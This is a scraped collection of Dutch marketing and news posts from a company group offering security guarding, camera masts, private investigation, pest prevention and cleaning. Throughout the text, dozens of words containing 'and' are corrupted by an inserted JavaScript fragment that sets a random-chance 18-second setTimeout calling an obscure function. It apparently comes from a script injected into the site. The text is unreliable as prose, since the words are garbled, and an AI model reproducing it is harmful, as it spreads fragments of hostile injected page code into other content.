Wij bewaken wat u lief is…of wordt

Mobiele camerabewaking op mast hurenCorrect Beveiliging verricht een scala aan diensten die bijdragen aan een meer veilige leef-, woon- en werkomgeving. Daar komt weer een dienst bij. Inmiddels leveren wij voor een aantal bouwbedrijven masten die voorzien zijn van camerabeveiliging. Deze masten zijn voorzien van de laatste technische snufjes waardoor een optimaal resultaat het logische gevolg is.

Met die masten bewaken we niet alleen uw bouwproject, een grondverzet project of een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere plaats waar gewerkt wordt en kostbare zaken liggen opgeslagen. We voorkomen vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andalisme, we kijken mee wanneer u toezicht wilt. Daarnaast kunt u de beweging van mensen volgen of in kaart brengen.

Kortom, een multifunctionele oplossing die u van dienst kan zijn.

Interesse?

Graag gaan we met u in gesprek, vrijblijvend en zonder kosten. Om met u te verkennen wat voor uw kostbaarheid, uw liefde of uw professie de beste oplossing is.

Bel: 0416-691491 of stuur uw vraag naar: info-correct-groep.nl

Rechercheren? Dat doet de politie toch?

Bedrijfsrecherche

Dat klopt! De politie rechercheert….ook.
Maar wist u dat er ook particuliere recherchebureaus zijn die onderzoeken uitvoeren? Diefstal binnen bedrijven, verduistering, frauduleus ziekteverzuim, gesjoemel met geld, uitkeringen en uren, merkenfraude, alimentatiefraude, noem het maar op. En sterker nog: We hebben het er druk mee!

Waar moet een particulier recherchebureau aan voldoen?

Uiteraard kan niet iedereen die dit leuk lijkt een recherchebureau starten. Er dient voldaan te worden aan een aantal strenge (wettelijke) voorwaarden:

Vergunning:

Er dient een vergunning te worden afgegeven door het Ministerie van Veiligheid en Justitie. Deze wordt uitsluitend verstrekt als na een grondig antecedentenonderzoek naar de eigenaar, is gebleken dat deze als “betrouwbaar” kan worden beschouwd.

Screening personeelsleden:

Het personeel dat wordt ingezet bij de recherchewerkzaamheden, wordt gescreend door de politie. Dit is noodzakelijk gezien de vertrouwelijkheid van de zaken die worden onderzocht.

Opleiding personeelsleden:

Het personeel dient aantoonbaar deskundig en opgeleid te zijn op het gebied van recherchewerkzaamheden en de privacy-aspecten die hierbij horen. Alle medewerkers hebben de opleiding tot Particulier Onderzoeker met goed gevolg afgerond en zijn op de hoogte van de Privacy Gedragscode van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche.

Privacy Gedragscode:

In de Privacy Gedragscode van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche staat onder andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere omschreven welke onderzoeksmethodiek onder welke voorwaarden gehanteerd mag en kan worden. Bij het kiezen voor een bepaalde werkwijze zal een Particulier Onderzoeker zich altijd een aantal zaken moeten afvragen:

  1. Is er een gerechtvaardigd belang? Wat is het belang van de opdrachtgever en is dit op “morele” gronden te onderbouwen?
  2. Proportionaliteit: Staat de gekozen methodiek in verhouding tot het doel van het onderzoek?
  3. Subsidiariteitsbeginsel: De Particulier Onderzoeker wordt geacht om bij de uitvoering van een onderzoek een zo licht mogelijk (minste impact op de privacy van de onderzochte persoon) middel toe te passen, en zal hier dus altijd kritisch naar moeten blijven kijken.

Aanmelding College Bescherming Persoonsgegevens:

Gezien het feit dat in een onderzoek altijd in meer of mindere mate gegevens van personen worden verwerkt, dient elk Particulier Recherchebureau te zijn aangemeld bij het College Bescherming Persoonsgegevens.

Waarheidsvinding:

Het doel van een onderzoek is altijd: Waarheidsvinding. De Particulier Onderzoeker onderzoekt en rapporteert wat hij waarneemt. Afhankelijk van de bevindingen wordt de onderzochte persoon eventueel geconfronteerd met de bevindingen.
Correct Diensten is een erkend Particulier Recherchebureau. Naast de bovenstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande eisen voldoen wij ook aan de keurmerkeisen van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche en de Branchevereniging van Particuliere Onderzoeksbureaus (BPOB). Jaarlijks wordt door onafhankelijke bureaus vastgesteld dat wij beschikken over de juiste mate van expertise en dat wij voldoen aan alle wettelijke criteria. Tevens worden wij getoetst op het naleven van de CAO en de Privacy Gedragscode.
Heeft u te maken met een situatie waarin diefstal of fraude mogelijk een rol speelt, aarzel dan niet! Neem contact met ons op voor een vrijblijvend gesprek. Wij helpen u graag!

Project: Vogelwering Amsterdam CS

Vogelwering netten duiven Amsterdam CS Centraal Station

Al geruime tijd schrijven wij op onze Facebook pagina items over ons prachtige project: Vogelwering Amsterdam Centraal Station. De start stond geplandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and in week 33 van dit jaar en jawel, we zijn druk bezig met dit mooie project voor Correct Ongediertepreventie.

Wat een monsterklus… 45.000m2 vogelwerende netten. Of wij even alvast 20.000 m2 kunnen zetten in 12 weken? Na alle voorbereidingen, vergaderingen, documenten e.t.c. kon de klus dan eindelijk starten.

Maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andag 14-08-2017

Een deel van de goederen is geleverd. Ook is het gehele werkveld ingericht.

Dinsdag 15-08-2017

Direct met ons plan tot uitvoering gestart. Komt het zo uit als gedacht? Hebben we wel goed gemeten? Met enkele hindernissen zijn we toch echt gestart met monteren. Aan het einde van de dag zijn 2 bogen voorzien met 780m2 vogelwerende netten, in 1 dag en met 2 personen. Een goede start!

Komende dagen komen er meer medewerkers om de klus te klaren. Hierdoor gaat ook de productiesnelheid omhoog. Op korte termijn zullen er meer detail foto’s worden toegevoegd. Zo krijgt u een goede indruk van de omvang en technieken. Houd onze Facebook pagina in de gaten.

Bestrijding vogels treinstation Amsterdam netten

Meer weten?

Neem contact op met Jasper Kooiman.

Uw nachtrust gewaarborgd door Correct Beveiliging

Nachtrust gewaarborgd

Het scenario

Het is drie uur in de ochtend… U schrikt wakker!!
De telefoon gaat…
Wat is er aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and? Is er iets ernstigs gebeurd?
U neemt geschrokken de telefoon op. Hallo???

Goedemorgen, dit is de alarmcentrale…..

Wij hebben een inbraakmelding ontvangen bij uw bedrijf. Wilt u gaan controleren wat er aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is?

Twijfelend kleedt u zich aan… Buiten is het erg donker. Bovendien regent het erg hard. U stapt de auto in en rijdt naar uw bedrijf. Het zicht is slecht en u bent gespannen…

Na 30 minuten bent u bij uw bedrijf. U ziet het al van buiten: de flitslamp op de gevel brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andt en het geluidssignaal van het alarm gaat af. Gespannen gaat u naar binnen en schakelt het alarm uit. Achter in het pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and hoort u iets klapperen… Uw hart klopt in uw keel….Hallo?….Is daar iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and??

Zo kan het gelukkig ook:

Het is half acht in de ochtend. U staat heerlijk uitgeslapen op om weer naar uw bedrijf te gaan. U ontbijt met uw gezin en gaat hierna naar kantoor.
U ziet in uw mailbox dat er de afgelopen nacht een alarmmelding is geweest en dat een beveiliger van Correct Beveiliging door de alarmcentrale is opgeroepen en de melding voor u heeft afgehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeld.

Hij was kort na de melding ter plaatse en heeft een controle uitgevoerd. Tijdens de controle bleek dat er een raam was open gewaaid, waardoor de lamellen waren gaan bewegen. Hierdoor was het alarm afgegaan en de melding veroorzaakt. De beveiliger heeft na de controle het systeem hersteld en weer ingeschakeld. Uiteraard heeft hij hierna uw pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and weer keurig afgesloten. Steeds meer ondernemers én particulieren weten Correct Beveiliging te vinden als integere en betrouwbare beveiligingspartner, die ervoor zorgt dat zij onbezorgd en uitgerust hun leven kunnen leiden en hun klanten kunnen bedienen.

Is uw interesse gewekt?

Neemt u dan gerust contact met ons op voor een vrijblijvende afspraak met een van onze adviseurs. Wij komen graag bij u op locatie om samen met u de mogelijkheden te bespreken en een op maat gesneden plan op te stellen.

U kunt ons bereiken op telefoonnummer 0416 69 14 91 of per e-mail: info@correct-groep.nl. Bij telefonisch contact kunt u vragen naar Albert Sitalsing.

Uitzending VARA Kassa – Correct Ongediertepreventie

Op zaterdag 27 mei verscheen Correct Ongediertepreventie in een uitzending van Vara Kassa. Bekijk hier op welke wijze Correct ratten bestrijdt en zorgt voor preventie.

Uitzending bekijken

Meer weten? Neem contact met ons op.

Fraude binnen uw bedrijf: Nachtmerrie voor elke ondernemer!

Bedrijfsrecherche Correct Groep

Heeft u het weleens meegemaakt? Het gevoel dat er iets niet klopt….. Natuurlijk, u vertrouwt uw medewerkers….maar toch…. We lezen er regelmatig over: frauderende medewerkers. En voor al die ondernemers die denken “Mij overkomt het niet”: Het overkomt ons allemaal in meer of mindere mate. Met grote en vervelende gevolgen.

Diefstal en verduistering, onterechte ziekmeldingen, vertegenwoordigers en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere buitendienst-medewerkers die hun werktijd gebruiken voor andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere zaken, men deinst er niet voor terug. De werkgever en de “integere” collega’s zijn de dupe. De mensen vertrouwen elkaar niet meer, verdenken elkaar en de werksfeer gaat in no time kapot. Bij constatering van dergelijke zaken komt het regelmatig voor dat er niet of nauwelijks actie wordt ondernomen. Omdat men stiekem hoopt dat dit wangedrag vanzelf stopt of omdat men simpelweg geen idee heeft hoe men dit kan aanpakken. Hoe kom je erachter wie dit doet en hoe ga je te werk?

Recherchebureau Correct

Recherchebureau Correct heeft jarenlange ervaring hiermee en staat u graag terzijde! Eerst komen wij bij u langs voor een kosteloze intake. Wij gaan met u in gesprek om naar u te luisteren en het probleem goed in kaart te krijgen. Tijdens het gesprek stellen wij vast of er sprake is van een gerechtvaardigd belang. Als hier sprake van is en de zaak is goed in beeld, dan werken wij een uitgebreid voorstel voor u uit.

In dit voorstel wordt de casus omschreven en de onderzoeksmethode beschreven. De werkwijze is dan al door ons getoetst aan het proportionaliteits- en subsidiariteitsbeginsel, wat inhoudt dat deze in verhouding moet staan tot het te behalen doel. Tevens moet het de lichtst mogelijke methode zijn om de waarheid te achterhalen. In ons voorstel wordt ook de wijze en frequentie van rapporteren benoemd. Het is natuurlijk van groot belang dat u gedurende het onderzoek op de hoogte wordt gehouden.

Gebruikte methoden

Het feitelijke onderzoek kan, afhankelijk van de zaak, bestaan uit diverse methodieken. Denk hierbij bijvoorbeeld aan:

  • Het plaatsen van heimelijke camera-apparatuur en verwerken van de beelden;
  • Onderzoek in open bronnen op internet;
  • Het observeren van personen;
  • Het doen van proefaankopen;
  • Uitvoeren van buurtonderzoek;
  • Het voeren van confrontatiegesprekken met onderzochte personen.

Waarborging van privacy

Natuurlijk is het heel belangrijk dat rekening wordt gehouden met de privacy van personen. De richtlijnen voor het uitvoeren van een onderzoek staan omschreven in de Privacy Gedragscode van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Veiligheidsbranche, sector Particuliere Onderzoeksbureaus.

Recherchebureau Correct is houder van het Keurmerk van de Branchevereniging voor Particuliere Onderzoeksbureaus. Dit houdt in dat er jaarlijks een onafhankelijke toetsing plaatsvindt of de richtlijnen wel naar behoren worden gevolgd en of aan alle wettelijke eisen wordt voldaan.

Meer weten?

Bij Recherchebureau Correct bent u dus aan het juiste adres als u een einde wilt maken aan fraude, verduistering en diefstal binnen uw bedrijf. Bij twijfel: Bel ons! Wij komen graag vrijblijvend bij u langs!

Correct Groep en Cleaning Service Gorinchem samen verder

Correct Schoonmaak is onderdeel van de Correct Groep, een familiebedrijf dat bestaat sinds 1977. Zij zijn actief in bijna alle sectoren. Van particulieren tot overheidsinstellingen en van scholen tot ziekenhuizen. Correct Schoonmaak is lid van de OSB. Cleaning Service Gorichem is ook een familiebedrijf waarvan de dagelijkse leiding in handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden was van de eigenaren Recep en Marianne Avci. Recep en Marianne zijn beide in dienst getreden bij de Correct Groep.
Door de vele overeenkomsten tussen beide bedrijven hebben Recep en Marianne besloten om verder te willen gaan onder de Correct Groep. Belangrijk om te weten is, dat er voor de bestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande klanten van Cleaning Service Gorichem niets zal verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen. De vertrouwde gezichten blijven komen. Wat wel verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andert is het logo.

Informatieavond Beveiliging, Veiligheid & Recherchediensten

Hoe veilig is uw bedrijf?

Datum: Donderdag 2 februari | D’Alburcht, Wijk & Aalburg
Dagvoorzitter: de heer Joan G. Wassink
Directievoorzitter Rabobank Altena

Aanmelden – Gratis toegang!

Meld u aan per e-mail aan als u aanwezig wilt zijn. U krijgt op deze avond een GRATIS goodiebag, gevuld door onze partners!

Betere hulp bij noodsituatie voor senioren

REGIO – De eerste resultaten zijn bekend van de proef om de veiligheid van zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig wonende kwetsbare senioren te verbeteren. Deze proef startte in augustus 2016 in Etten-Leur. Vijftig zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig wonende senioren nemen hieraan deel. Slimme techniek gecombineerd met een sociaal hulpverleningsnetwerk zorgt voor snellere en meer adequate hulp bij noodsituaties. Daarnaast vertellen meerdere deelnemende ouderen dat ze zich minder eenzaam voelen en beter slapen. “Ik ging elke nacht naar bed met angst. Nu voel ik me veilig en kan ik eindelijk met een gerust gevoel slapen”, aldus een van de deelnemers.

Resultaten proef

De resultaten van de proef zijn zeer bemoedigend om mensen op een veilige manier langer thuis te laten wonen. Het blijkt dat deelnemers zich veiliger voelen in hun woning, ze de sensoren niet ervaren als inbreuk op hun privacy, ze zich meer verbonden voelen met hun mantelzorgers(s) en dat ze het leuk vinden om actief mee te denken aan de doorontwikkeling van het systeem. In Heeze-Leende is men inmiddels ook gestart met het systeem. Begin volgend jaar wordt dit uitgebreid met nog meer gemeentes. Doel is om het systeem de komende twee jaar over de Provincie Brabant uit te rollen. Daarnaast neemt het Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse Rode Kruis dit initiatief mee in haar activiteiten om de zelfredzaamheid van mensen te vergroten.

Veiligheid en zorg

Veel ouderen voelen zich kwetsbaar. Ze zijn bang dat ze na een val pas na lange tijd gevonden worden of bij brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and niet tijdig hun huis kunnen verlaten. Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke problematiek die door de drie Brabantse veiligheidsregio’s op een unieke wijze opgepakt is door zorg en veiligheid te koppelen. Directeur Nico van Mourik van Veiligheidsregio Midden- en West-Brabant (VRMWB) is blij met deze aanpak. “De voordelen van techniek worden slim gekoppeld aan een netwerk van verantwoordelijke burgers”. Tjalke de Jong, één van de initiatief-nemers, vult aan met een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander pluspunt. “Het organiseren van hulp na een melding haalt een deel van de ouderen uit hun sociaal isolement. Ze hebben meer contact met hun buren of met kinderen die in de buurt wonen, omdat die buren en mantelzorgers de mogelijke alarmmeldingen opvolgen”.

Hoe werkt het?

De woningen van de deelnemende senioren zijn uitgerust met sensoren die een noodsituatie registreren. Rookmelders bijvoorbeeld signaleren een beginnende brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, raam- en deurcontacten detecteren een inbraak en bewegingssensoren registreren een bepaalde tijd geen beweging in de woning dat kan wijzen op een val. Geeft zo’n sensor alarm dan wordt niet alleen een particuliere alarmcentrale gebeld, maar ook bijvoorbeeld een buurman of familielid dat in de buurt woont om snel hulp te bieden. Tegelijk met deze melding wordt relevante informatie over de gezondheid en woonsituatie meegestuurd zodat hulp op maat geboden kan worden.

Winnaar innovatie prijs

In 2015 schreven de drie Brabantse veiligheidsregio’s een prijsvraag uit voor maatschappelijke veiligheidsinnovatie. Gevraagd werd om praktische oplossingen te bedenken om de veiligheid van zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig wonende, minder zelfredzame ouderen te verbeteren. De prijs werd gewonnen door een samenwerking van het Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands Instituut voor Gezondheidszorg en Welzijn (NIGW), particuliere alarmcentrale Welzijnservices en sensortechnologiebedrijf Altijd Thuis. Zij ontwikkelden een veiligheidsconcept voor informatie gestuurde veiligheidszorg en een sociaal hulpverleningsnetwerk rond kwetsbare ouderen.

Info: http://www.leefsamen.nl/

Recherchebureau Correct

Bedrijfsrecherche Correct Groep

Organisaties worden steeds vaker het slachtoffer van interne diefstal en fraude. Of het nu gaat om het wegnemen van geld of goederen, “eigen dingen” doen in de baas z’n tijd, tijdens (onterecht) ziekteverzuim bezigheden verrichten die haaks staan op de medische klachten – de werkgever is altijd de dupe.

Ondernemers die dergelijke zaken constateren, aarzelen vaak om actie te ondernemen. In de basis vertrouwen ze hun personeel; ze hopen dat het wangedrag vanzelf ophoudt. Ook willen ze geen onrust binnen de organisatie en laten ze daarom vaak lang de boel de boel. Meestal stoppen de wanpraktijken helaas niet, en gaan ze ten koste van de goede werksfeer en de motivatie van zowel management als medewerker.

Recherchebureau

Recherchebureau Correct kan u helpen bovengenoemde problemen aan te pakken en de goede werksfeer te herstellen en te handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andhaven. Als particulier recherchebureau zijn wij vanuit het Ministerie van Veiligheid en Justitie bevoegd onderzoeken uit te voeren naar het hierboven genoemde.

College Bescherming Persoonsgegevens

Wij zijn aangemeld bij het College Bescherming Persoonsgegevens. Onze onderzoeken worden uitgevoerd conform de Privacy Gedragscode en voldoen altijd aan de wettelijke voorschriften. Het feit dat wij beschikken over het (jaarlijks door N’Lloyd getoetste) Keurmerk van de Branchevereniging van Particuliere Onderzoeksbureaus is uw bewijs dat u zaken doet met een deskundig en integer particulier recherchebureau.

Onze medewerkers hebben ruime ervaring op het gebied van onderzoeks-, opsporings- en observatiewerkzaamheden en zijn gescreend door de politie. Van elk uitgevoerd onderzoek ontvangt u een uitgebreide rapportage, die een belangrijk hulpmiddel kan zijn om de waarheid aan het licht te brengen.

Meer weten?

Neem dan contact op met Correct Beveiliging.